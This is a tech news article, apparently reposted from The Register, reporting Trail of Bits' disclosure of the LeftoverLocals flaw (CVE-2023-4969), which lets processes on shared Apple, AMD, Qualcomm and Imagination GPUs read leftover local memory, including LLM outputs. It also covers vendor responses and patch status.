Future Tech

Apple, AMD, Qualcomm GPU security hole lets miscreants snoop on AI training and chats

Tan KW
Publish date: Thu, 18 Jan 2024, 08:52 AM
Tan KW
0 460,576
Future Tech

A design flaw in GPU drivers made by Apple, Qualcomm, AMD, and likely Imagination can be exploited by miscreants on a shared system to snoop on fellow users.

That means creeps can, for instance, observe the large language models and other machine-learning software being accelerated by the processors for other users. That will be a worry for those training or running LLMs on a shared server in the cloud. On a non-shared system, malware that manages to run on the box could abuse the weakness to spy on the lone user's GPU activities.

Crucially, the graphics chips and their drivers are supposed to prevent this kind of monitoring, by fully isolating the memory and other resources used by each user process from one another, but in reality, many do not securely implement this functionality sufficiently, allowing data to be stolen.

The vulnerability, tracked as CVE-2023-4969 and dubbed LeftoverLocals, was discovered by Tyler Sorensen, a security research engineer on the Trail of Bits AI and ML assurance team and an assistant professor at University of California, Santa Cruz. 

Research made public on Tuesday detailed how miscreants can exploit the hole to read data they're not supposed to in a system's local GPU memory. Plus, they published proof-of-concept code to snoop on an LLM chatbot in conversation with another user on a shared GPU-accelerated box. 

To exploit the security oversight, the attacker just needs to have sufficient access to a shared GPU to run application code on it. That code, in spite of any isolation protections in place, on a vulnerable configuration can mine local memory for areas that have been used by other programs as a data cache. Exploitation thus involves inspecting these cache areas for values written by other users and processes, and exfiltrating that information.

Each cache should ideally be wiped after a program finishes using it, thwarting the theft of data. This deletion doesn't automatically happen, allowing other applications on the GPU to observe the leftover contents. Hence the name, LeftoverLocals.

"This data leaking can have severe security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights," according to Sorensen and Heidy Khlaaf, Trail of Bits' engineering director for AI and ML assurance.

While the flaw potentially affects all GPU applications on vulnerable chips, it is especially concerning for those processing machine-learning applications because of the amount of data these models process using GPUs, and therefore the amount of potentially sensitive information that could be swiped by exploiting this issue.

"LeftoverLocals can leak ~5.5 MB per GPU invocation on an AMD Radeon RX 7900 XT which, when running a 7B model on llama.cpp, adds up to ~181 MB for each LLM query," Sorensen and Khlaaf explained. "This is enough information to reconstruct the LLM response with high precision."

The bug hunters have been working with the affected GPU vendors and the CERT Coordination Center to address and disclose the flaws since September 2023.

AMD, in a security bulletin issued Tuesday, said it plans to begin rolling out mitigations in March though upcoming driver updates. The chip house also confirmed that a lot of its products are vulnerable to the memory leak, including multiple versions of its Athlon and Ryzen desktop and mobile processors, Radeon graphics cards, and Radeon and Instinct data center GPUs.

When asked about LeftoverLocals, an AMD spokesperson directed The Register to the bulletin for its mitigation plans, and sent the following statement:

Google pointed out to Trail of Bits that some Imagination GPUs are impacted, and that the processor designer released a fix for its holes last month.

Additionally, a Google spokesperson gave The Register this statement:

Apple, meanwhile, told The Register its M3 and A17 series processors have fixes for the vulnerability, and declined to comment on the boffins' assessment that "the issue still appears to be present on the Apple MacBook Air (M2)."

"Furthermore, the recently released Apple iPhone 15 does not appear to be impacted as previous versions have been," the Trail of Bits team added.

A spokesperson for Apple also told us that the iGiant appreciated the researchers' work as it advances the mega-corp's understanding of these types of threats.

Qualcomm has issued a firmware patch, though according to the researchers it only fixes the issue for some devices. The chip goliath did not respond to The Register's inquiries.

Nvidia and Arm are not said to be affected. That's the good news here: loads of AI accelerators in the cloud come from Nvidia, so if you're training or running on those, you'll be OK. The others - Apple, Imagination, and Qualcomm in particular - aren't known for their presence in public cloud GPU pools, so the risk there is limited. ®

 

https://www.theregister.com//2024/01/17/leftoverlocals_gpu_flaw/

Discussions
Be the first to like this. Showing 0 of 0 comments

Post a Comment